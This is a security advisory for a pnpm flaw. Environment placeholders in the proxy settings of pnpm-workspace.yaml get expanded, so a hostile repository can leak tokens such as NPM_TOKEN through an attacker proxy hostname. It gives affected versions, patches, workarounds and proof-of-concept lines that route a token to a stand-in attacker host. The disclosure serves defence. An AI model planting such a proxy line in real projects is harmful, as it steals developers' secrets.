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GHSA-vx52-2968-3vc6
Summary
pnpm expands ${VAR} environment placeholders in the httpProxy / httpsProxy / noProxy settings read from a project's pnpm-workspace.yaml. Because a project manifest is repository-controlled, a malicious repository that a victim merely clones and runs pnpm install in can route all install traffic through an attacker proxy whose hostname or userinfo embeds — and thereby exfiltrates — an environment secret such as NPM_TOKEN or GITHUB_TOKEN.
This bypasses a trust boundary pnpm deliberately enforces: env-placeholder expansion of request-destination settings is already suppressed for registry, pnprServer, registries and namedRegistries when they come from an untrusted project manifest, and the sibling .npmrc reader already classifies the proxy keys as request destinations. The manifest-side guard set simply omitted them.
Impact
An attacker who controls only the contents of a repository's pnpm-workspace.yaml — a public repo, a fork, or a supply-chain pull request — can read many values out of the victim's process environment and have them delivered to an attacker-controlled host. No pre-existing access to the victim's store, global config, lockfile, node_modules, or environment is required. The secret is exfiltrated during config loading, before any lifecycle script runs.
This turns "I can author a project manifest" into "I read the victim's environment secrets."
Affected versions
Introduced in pnpm 10.7.0, which added environment-variable expansion in setting names and values.
- pnpm 11.x:
>= 11.0.0, < 11.11.0 - pnpm 10.x:
>= 10.7.0, < 10.34.5
The Rust port (pacquet) and the registry server (pnpr) are not affected.
Patches
- pnpm 11.11.0 and later
- pnpm 10.34.5 and later
The fix adds httpProxy, httpsProxy, noProxy, proxy and noproxy to the request-destination key set in @pnpm/config.reader (src/getOptionsFromRootManifest.ts), so env placeholders in proxy settings from an untrusted manifest are dropped rather than expanded — matching the existing registry / pnprServer handling and the .npmrc reader's isRequestDestinationValueKey. Regression tests cover the proxy keys.
Workarounds
Upgrade to a patched version. Until then, do not run pnpm commands in an untrusted repository in an environment that holds secrets, or inspect the repository's pnpm-workspace.yaml for proxy settings before installing.
Proof of concept
# pnpm-workspace.yaml in an untrusted repository
packages:
- .
httpsProxy: "http://${NPM_TOKEN}.collector.attacker.example.com:8080"
With NPM_TOKEN set in the victim's environment, pnpm install expands the placeholder and routes install traffic through the attacker's host, whose hostname (and DNS query) carries the token.
Unit level:
process.env.PNPM_TEST_TOKEN = 'secret'
const o = getOptionsFromPnpmSettings(process.cwd(), { httpsProxy: 'http://${PNPM_TEST_TOKEN}.evil/' })
// Vulnerable: o.httpsProxy === 'http://secret.evil/'
// Patched: o.httpsProxy === undefined
Using registry or pnprServer in place of httpsProxy does not leak on either version — those keys were already guarded, which is what made the proxy keys a hole in an existing boundary rather than an unguarded surface.
Credit
Reported privately. A second finding in the original report — the Authorization header being retained across a same-host https -> http redirect — was assessed and is not treated as a pnpm vulnerability: npm (make-fetch-happen, minipass-fetch), Yarn (got) and reqwest all compare host rather than origin, and a registry that redirects from HTTPS to plaintext HTTP is itself the broken component. That behavior is being discussed publicly at https://github.com/orgs/pnpm/discussions/13598.
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The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. The attacker needs the user to perform some action, like clicking a link. The vulnerability can affect other systems as well, not just the initial system. There is a high impact on the confidentiality of the information.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
Probability that this vulnerability will be exploited in the wild within the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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